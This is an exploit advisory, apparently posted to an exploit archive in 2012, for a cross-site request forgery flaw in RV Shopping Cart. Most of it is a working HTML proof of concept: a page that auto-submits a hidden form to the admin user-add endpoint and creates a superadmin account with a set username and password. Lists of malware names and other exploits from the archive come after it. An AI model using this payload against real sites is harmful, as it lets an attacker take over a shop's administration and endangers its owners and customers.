RV Shopping Cart Cross Site Request Forgery

Posted on 29 August 2012

# Exploit Title: RV Shopping cart CSRF Vulnerability
# Date: 26/08/2012
# Author: DaOne (@LibyanCA)
# Vendor: http://www.scripts4webmasters.com
# Greetings to LCA

# CSRF Add Admin

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://[target]/rvp-admin/user-add.php">
<input type="hidden" name="user_id" value=""/>
<input type="hidden" name="username" value="webadmin">
<input type="hidden" name="email" value="admin@email.com">
<input type="hidden" name="password" value="pass123">
<input type="hidden" name="group[]" value="1"/>
<input type="hidden" name="active" value="1"/>
<input type="hidden" name="superadmin" value="1"/>
<input type="hidden" name="postnote" value=""/>
<input type="hidden" name="save_user" value="Save"/>
</form>
</body>
</html>

TOP

Malware :

RATDispenser
whispergate
Borat RAT
Trojanized X_Trader
BlackLotus

Last 20

Exploits :

Docker Privileged Container Kernel Escape
Systemd Insecure PTY Handling
SOPlanning 1.52.00 Cross Site Scripting
SOPlanning 1.52.00 Cross Site Request Forgery
SOPlanning 1.52.00 SQL Injection

Last 20